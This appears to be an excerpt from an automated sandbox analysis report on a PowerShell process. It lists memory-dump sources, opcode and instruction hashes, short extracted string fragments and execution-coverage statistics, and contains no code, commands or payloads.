                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c45cfe6b8432462d3f8be61676c43a3a9fd5b07f23e19539244022827039b49a
                                                                                                      • Instruction ID: 497f704d7f6171053a078b300793a86d55aa3f14204bd3a527f62ff8b81a733f
                                                                                                      • Opcode Fuzzy Hash: c45cfe6b8432462d3f8be61676c43a3a9fd5b07f23e19539244022827039b49a
                                                                                                      • Instruction Fuzzy Hash: 2401477671021ACBC73445AED40097BB7DADBC222BF14C47EDA88C7640DA32C845C360
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3a9ba68f374f318d99cc7c757b2920d8aea2c738a9568b63060d853a54c78a9
                                                                                                      • Instruction ID: 85dc3157f0a7a829b3eef9ee93f4382c378f854e447b7db0cc549d5929bff749
                                                                                                      • Opcode Fuzzy Hash: a3a9ba68f374f318d99cc7c757b2920d8aea2c738a9568b63060d853a54c78a9
                                                                                                      • Instruction Fuzzy Hash: A9119330D0024ADBEF74EAA5D5C97ECB771EF4535AF1418ADD001B61A0AB74A8C5CB15
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0f5e9206b3d1ca10822e3cca5058f50df6edb7c72d0beae21b6b058b67d46c68
                                                                                                      • Instruction ID: 8ff709bf08d7c1de4d2081b85c08167d699016fa252fa2db4a14fdd83d8d10c1
                                                                                                      • Opcode Fuzzy Hash: 0f5e9206b3d1ca10822e3cca5058f50df6edb7c72d0beae21b6b058b67d46c68
                                                                                                      • Instruction Fuzzy Hash: 30012BF2B4417097CB2116FC1A225AD6B52CBD1758F0144A9CD01AFA45DD759D4287D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2094931924.0000000004ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ABD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4abd000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 905155bdfecf34e479c7ba1e5225d2e345ebf5089d986eecb4f3677a43861728
                                                                                                      • Instruction ID: d24a47cd96c284560c16a08c34bc33e72184d6c9eabc81c770638271e1ee30d0
                                                                                                      • Opcode Fuzzy Hash: 905155bdfecf34e479c7ba1e5225d2e345ebf5089d986eecb4f3677a43861728
                                                                                                      • Instruction Fuzzy Hash: 7201F7715057009AF7108F25E9C0BA6BFACDF41324F08C41AED8A5A143C679A841D6F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 52a4b9e7b7e0414389605ad8f511511e8dc2789447a0048c6c2f9005197dc8dc
                                                                                                      • Instruction ID: f07b431745d81d9fc9b06f26423f14bef6c727369a5ef1f8e0e4c9cb5536e764
                                                                                                      • Opcode Fuzzy Hash: 52a4b9e7b7e0414389605ad8f511511e8dc2789447a0048c6c2f9005197dc8dc
                                                                                                      • Instruction Fuzzy Hash: 5DF0ACB16011404BCB18EAF8D4D08E9BFA5EF5E36C318884CD41B5B381C722BA03C791
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2094931924.0000000004ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ABD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4abd000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 365bcfb225e0141feb658a4e8f8501465d1800acc767ccc2cfa926c34f7be824
                                                                                                      • Instruction ID: 8aa85d94d54af6687a2abe7082926c544b036d606cb506bba6971f81671498cd
                                                                                                      • Opcode Fuzzy Hash: 365bcfb225e0141feb658a4e8f8501465d1800acc767ccc2cfa926c34f7be824
                                                                                                      • Instruction Fuzzy Hash: 0801717240E3C05EE7128B259D94B52BFB8DF53224F1DC1CBD9889F1A3C2699849C7B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6a3d6529a8d48f470c3a572f157dcc65547fd8d30f04da09a629a188e24ad95d
                                                                                                      • Instruction ID: a5326d0b02b02a31a1bb59420be7301cc8ba8f41f597a14659a30dec4e93f142
                                                                                                      • Opcode Fuzzy Hash: 6a3d6529a8d48f470c3a572f157dcc65547fd8d30f04da09a629a188e24ad95d
                                                                                                      • Instruction Fuzzy Hash: 6DF055F0A04081A7CB28D7B08058C51BFB2BBD621871887CDD4441F14BFE23C842CB61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 380c699e10fe3a06ebe84fe8b5e866786c5827223cb374c52f3bdba84178277e
                                                                                                      • Instruction ID: 3c347dd599870e64617a9ec11a20df8e2cf178a8c7b202f155b9d95541b4ffa2
                                                                                                      • Opcode Fuzzy Hash: 380c699e10fe3a06ebe84fe8b5e866786c5827223cb374c52f3bdba84178277e
                                                                                                      • Instruction Fuzzy Hash: 0DE061F86041456BD718C674C954C51FB71AFCD22431CC59EE0441F14BDB61DC42C771
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$84!l$84!l$84!l$84!l$tPfq$tPfq$tPfq$tPfq$$fq$(lq$(lq$(lq$(lq
                                                                                                      • API String ID: 0-1456710882
                                                                                                      • Opcode ID: cc96fd1c04c6fcfa7c4eca7f9ef243a47d65b2f4a48ef815f5afd9a2bf8bc167
                                                                                                      • Instruction ID: 1a39279abccd0f049d8c26a0e1e812905efa63a57436468ec94b1afa56d25df9
                                                                                                      • Opcode Fuzzy Hash: cc96fd1c04c6fcfa7c4eca7f9ef243a47d65b2f4a48ef815f5afd9a2bf8bc167
                                                                                                      • Instruction Fuzzy Hash: 16A1F6F9B0021AAFCB249F69C441E6BBBE6BF85318F148459EA059B390DF71DC41C7A1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$84!l$84!l$d%lq$d%lq$d%lq$d%lq$tPfq$tPfq$$fq
                                                                                                      • API String ID: 0-3294698358
                                                                                                      • Opcode ID: 59d996c4ad25440a22eb07825c722d9912c2fad67e9f721b345fe8c1c3b168b6
                                                                                                      • Instruction ID: 6dd54e8253d383fad3f51bb7406c00de47048e62bec8b457c3ebb5a995f1f2ba
                                                                                                      • Opcode Fuzzy Hash: 59d996c4ad25440a22eb07825c722d9912c2fad67e9f721b345fe8c1c3b168b6
                                                                                                      • Instruction Fuzzy Hash: EC7137B1B112169FCB248F68C451E7BBBE6AF86708F14849AE901DB390DB35DC41C7B1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$84!l$84!l$TQkq$TQkq$tPfq$tPfq$$fq$$fq
                                                                                                      • API String ID: 0-3795720895
                                                                                                      • Opcode ID: 9836425d25ca0fdc48055e8296e4cc3f2b68bc947590c4c129d906d3a6c56c85
                                                                                                      • Instruction ID: 31a97ce4b573fd19cd2893873215f0fdaaed96649582596f3220987885708119
                                                                                                      • Opcode Fuzzy Hash: 9836425d25ca0fdc48055e8296e4cc3f2b68bc947590c4c129d906d3a6c56c85
                                                                                                      • Instruction Fuzzy Hash: AB41B4B570011ADFCB14DF58C440A6F7BB2BF85758F148499EA01AB784CB71EC41C7A2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                      • API String ID: 0-3718432614
                                                                                                      • Opcode ID: f19e0e91eb5b3bdcf6575cedac4c8699511f48660b526cdf1d8a192447515a1c
                                                                                                      • Instruction ID: 0f5aa9f57e7cdb9c67b776164f0cf76e792334453b66cb744d8a046728da9b8b
                                                                                                      • Opcode Fuzzy Hash: f19e0e91eb5b3bdcf6575cedac4c8699511f48660b526cdf1d8a192447515a1c
                                                                                                      • Instruction Fuzzy Hash: 4DF12EF17043869FCB258F69C840F6BBBFAAF85259F24857AD804CB2A1DB31D841C791
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$t~yq$$fq$$fq$$fq
                                                                                                      • API String ID: 0-1498645533
                                                                                                      • Opcode ID: 79d6a8d0c7db44bfbd490b01b24c7aff9e221dd4007a17dce617a8d47e90da97
                                                                                                      • Instruction ID: b2bc47248928f812911cb653df6ade7e65424b4ed5a90296c2fe6c872e56911d
                                                                                                      • Opcode Fuzzy Hash: 79d6a8d0c7db44bfbd490b01b24c7aff9e221dd4007a17dce617a8d47e90da97
                                                                                                      • Instruction Fuzzy Hash: 2AD138F1B0021A9FCB249FB98440A6BBBEAFFC5219F14847AD515CB241DF31D882C7A1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l$(f#l$(f#l$(f#l$4'fq$4'fq$4 l$4 l
                                                                                                      • API String ID: 0-3573586077
                                                                                                      • Opcode ID: 3353572fa09e55acdcce0584f8b3d9b77166386de41338fe6d6f487e34366436
                                                                                                      • Instruction ID: cb7c9d0307bcf2aaa7c3d680f56c29b7debd3486afce0477d6dffa9b72049f88
                                                                                                      • Opcode Fuzzy Hash: 3353572fa09e55acdcce0584f8b3d9b77166386de41338fe6d6f487e34366436
                                                                                                      • Instruction Fuzzy Hash: 9161D5F1F102199BCB14CB68C851E6ABBE7BF89318F149569D805AB784DF32EC41CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$84!l$84!l$tPfq$tPfq$$fq$$fq
                                                                                                      • API String ID: 0-668995607
                                                                                                      • Opcode ID: f4ccb14a1259301efad0506a06862f25f73da1b4d1862907418fd0ca749d933f
                                                                                                      • Instruction ID: f3ea1405f6850704df6d0c2e882ce72ef3e17d613f0734e5bf294b52d5330208
                                                                                                      • Opcode Fuzzy Hash: f4ccb14a1259301efad0506a06862f25f73da1b4d1862907418fd0ca749d933f
                                                                                                      • Instruction Fuzzy Hash: 2A51D6B4B0011A9FDF28CF59C441F6F7BA6BB85718F248455EA016B784CB71EC41CBA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq
                                                                                                      • API String ID: 0-701695664
                                                                                                      • Opcode ID: 63090a190f4148ea52c45159be4f0d5f0102d5bd886ce0cd6af3c6adc0a16bb5
                                                                                                      • Instruction ID: b7997b6df3e130528a7891d0d9e0ad229ec110c4cc2c3a468d2ea162b2b26da8
                                                                                                      • Opcode Fuzzy Hash: 63090a190f4148ea52c45159be4f0d5f0102d5bd886ce0cd6af3c6adc0a16bb5
                                                                                                      • Instruction Fuzzy Hash: D9128FB4B402189FDB14DB58C441EAABBB2FF89718F14C069E905AF755CB72DC82CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$$fq$$fq$$fq$$fq
                                                                                                      • API String ID: 0-1793556278
                                                                                                      • Opcode ID: 30f9e4d98ed5a71c832d5c6811306a57cb1b98d0f637f82a02e1613a74d0a667
                                                                                                      • Instruction ID: 99f201c59666d33e736717913fc9a8d03cf5946daee942ad3bb3e15e967b4197
                                                                                                      • Opcode Fuzzy Hash: 30f9e4d98ed5a71c832d5c6811306a57cb1b98d0f637f82a02e1613a74d0a667
                                                                                                      • Instruction Fuzzy Hash: 736119B1716209DFCB248E69C444A7ABBAAEF83229F14C07AD549CB291DB31D841C7B1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$84!l$d%lq$d%lq$d%lq$tPfq
                                                                                                      • API String ID: 0-1268773087
                                                                                                      • Opcode ID: c768ac4050c60285ca55d33070311c179eb7737076b5d9c0cf803b801693beff
                                                                                                      • Instruction ID: 29a9d62f54425a1f9c188677fe046322e83a3712c52f9924c2b8be10d77cf732
                                                                                                      • Opcode Fuzzy Hash: c768ac4050c60285ca55d33070311c179eb7737076b5d9c0cf803b801693beff
                                                                                                      • Instruction Fuzzy Hash: 2D31D1B4B012159FCB14CF58C451E6AFBE6BB89B18F148589E805AB341C771EC01CBA4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                                                                      • API String ID: 0-3759051638
                                                                                                      • Opcode ID: 0b1a5ad638c52f3c238c08038c051e8fbd7090bd87d4b08273b414bfec2ec972
                                                                                                      • Instruction ID: 9bbb617bd551be1a3b440fd2d98e165200346c0b1b6ca8afbb3593d87b5d2dbe
                                                                                                      • Opcode Fuzzy Hash: 0b1a5ad638c52f3c238c08038c051e8fbd7090bd87d4b08273b414bfec2ec972
                                                                                                      • Instruction Fuzzy Hash: 20412BF6710246DBCF294F6984419BBB7EEFF86218B6484BBF8118B281DB35C841C755
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 84!l$XRkq$XRkq$tPfq$$fq
                                                                                                      • API String ID: 0-1328269547
                                                                                                      • Opcode ID: 323b10a9bc8ae3e771da0f77b97d9e3bf31b3c5f70b3f60f19d124c9f345c2dc
                                                                                                      • Instruction ID: 2d2756cfe5c4b948a2c7e543f894655c525ab6458bd7adc3264e167404dcbe1f
                                                                                                      • Opcode Fuzzy Hash: 323b10a9bc8ae3e771da0f77b97d9e3bf31b3c5f70b3f60f19d124c9f345c2dc
                                                                                                      • Instruction Fuzzy Hash: 3841A1B0A04209DBDB24CF19C544EAAFBF6BF49718F19C4A9E8146B251C771ED80CBA0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                                                                      • API String ID: 0-3759051638
                                                                                                      • Opcode ID: ed012f260d25c2c6d2cdd3f9317d1fb1a97c301caa5d9dcf4c696092f0d0c41d
                                                                                                      • Instruction ID: 47f23f24df9503a506dda130cbeb364cdce01c8e9ef959b5d860bb6720cd6b85
                                                                                                      • Opcode Fuzzy Hash: ed012f260d25c2c6d2cdd3f9317d1fb1a97c301caa5d9dcf4c696092f0d0c41d
                                                                                                      • Instruction Fuzzy Hash: 8E316DFA7042568FCF298A798844D77B7BAAFCA119F2440BBCA4187180DF35C442C352
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 84!l$84!l$tPfq$tPfq
                                                                                                      • API String ID: 0-321544376
                                                                                                      • Opcode ID: 17b54bb110368089d5b073ac67f5c32f14876a5ecc5be1ae810d7e79954c28e8
                                                                                                      • Instruction ID: 85090d13e67ee90e7a07aa925f04c4c3cf87a9175e12dc10214c3713ce9c576d
                                                                                                      • Opcode Fuzzy Hash: 17b54bb110368089d5b073ac67f5c32f14876a5ecc5be1ae810d7e79954c28e8
                                                                                                      • Instruction Fuzzy Hash: 78914EB17002959FCB249F69C850F6BBBEAAFC5319F28C46AD905DB391CB31D841C791
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l$(f#l$(f#l$(f#l
                                                                                                      • API String ID: 0-2541482469
                                                                                                      • Opcode ID: cbe5f30382ab821faba294ce1d182e3a156fb6a8c39b46d43557d8668adf66e3
                                                                                                      • Instruction ID: d54b71626a03cbdc6564246bbda5aab4227b4b0a194f2dfc42a75310b44a26c5
                                                                                                      • Opcode Fuzzy Hash: cbe5f30382ab821faba294ce1d182e3a156fb6a8c39b46d43557d8668adf66e3
                                                                                                      • Instruction Fuzzy Hash: 30A1ADF5E00716DBDB20CF58C841E6AFBB6BF8A318F14856DD8556B704CB72A842CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$XY#l$XY#l
                                                                                                      • API String ID: 0-2115159488
                                                                                                      • Opcode ID: e9f6218984520729cc5af5f16f2fbd841dc2a193fd08a02eeb96671cd087d64d
                                                                                                      • Instruction ID: 19f896d02405dbc1985eb578a19a2006beb31f55f0989e315cf5b3b0ab546403
                                                                                                      • Opcode Fuzzy Hash: e9f6218984520729cc5af5f16f2fbd841dc2a193fd08a02eeb96671cd087d64d
                                                                                                      • Instruction Fuzzy Hash: 5C713DF1B042198FCB15DB6C8850A6ABFB5AFC6218F14C0FBD649CB691DA31C841C791
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l$(f#l$(f#l$(f#l
                                                                                                      • API String ID: 0-2541482469
                                                                                                      • Opcode ID: 8847ae53c839680f3ac2410ffc45fb2853ac18b4c26a3e9b3f6f0151382261c2
                                                                                                      • Instruction ID: 34ec2a4d14727485ffb8ed547e6bd59ce31d45065e056159d025388c660c5413
                                                                                                      • Opcode Fuzzy Hash: 8847ae53c839680f3ac2410ffc45fb2853ac18b4c26a3e9b3f6f0151382261c2
                                                                                                      • Instruction Fuzzy Hash: 5971AFF1A10219DBCB14DF58C491E6ABBF6BF8A308F14D169D804AB715CB71DC41CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l$(f#l$4'fq$4 l
                                                                                                      • API String ID: 0-1828323406
                                                                                                      • Opcode ID: bd9a7ea074dc8ff2984dac336bb416fd8b921aac2b0dbe651aaaf66c25f7e08b
                                                                                                      • Instruction ID: 21d379053b42ae6ab7b584c63d8fbb840c745aecbb5b0c2d43df78071b2c643d
                                                                                                      • Opcode Fuzzy Hash: bd9a7ea074dc8ff2984dac336bb416fd8b921aac2b0dbe651aaaf66c25f7e08b
                                                                                                      • Instruction Fuzzy Hash: FE51B3F1A00215DFCB14CB58C841EAABBF6BF89318F18856AE805AB755DB32EC41CB51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $fq$$fq$$fq$$fq
                                                                                                      • API String ID: 0-2113499236
                                                                                                      • Opcode ID: a0875c1d99f53d5860593ab68765e507a891968e0a55cd6fbb8827aaddb6391a
                                                                                                      • Instruction ID: c21c429d605e212e2eb5e7c20f4d3d7fc6df8e8575106dda48a0f488021e41b7
                                                                                                      • Opcode Fuzzy Hash: a0875c1d99f53d5860593ab68765e507a891968e0a55cd6fbb8827aaddb6391a
                                                                                                      • Instruction Fuzzy Hash: F72177B176024A9BDB34867A8801F27B7EE9BC531DF20842AE545CB385DD76C8C18321
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$$fq$$fq
                                                                                                      • API String ID: 0-2206495126
                                                                                                      • Opcode ID: 576a46eb496aa1d15a1a3add4cdcd624ca7f294b6cd270d5a38c311aef968920
                                                                                                      • Instruction ID: cd5ca9c502f6b8b93f58dcd7940d9261973c0796fe785f549681d6537f80f42e
                                                                                                      • Opcode Fuzzy Hash: 576a46eb496aa1d15a1a3add4cdcd624ca7f294b6cd270d5a38c311aef968920
                                                                                                      • Instruction Fuzzy Hash: 261195F2B392554BCB210B6CA8A4C367BDD7B9A07832501AFF102CB397CA90CC028352
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$$fq$$fq
                                                                                                      • API String ID: 0-2206495126
                                                                                                      • Opcode ID: ae95fe541fac0f04b6988523eeecdb6611140a9c65a99eb73be7ff9786e0886d
                                                                                                      • Instruction ID: 4b1cd3357a5dc6fa7d957f25f660d82aa577058fe0a1032563ad942170147c85
                                                                                                      • Opcode Fuzzy Hash: ae95fe541fac0f04b6988523eeecdb6611140a9c65a99eb73be7ff9786e0886d
                                                                                                      • Instruction Fuzzy Hash: 231104B560A28DDFCF29CE60C8909AA3B76BF4B358F10889AD8454F285C735DC01CB71

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.6%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:9.8%
                                                                                                      Total number of Nodes:254
                                                                                                      Total number of Limit Nodes:39
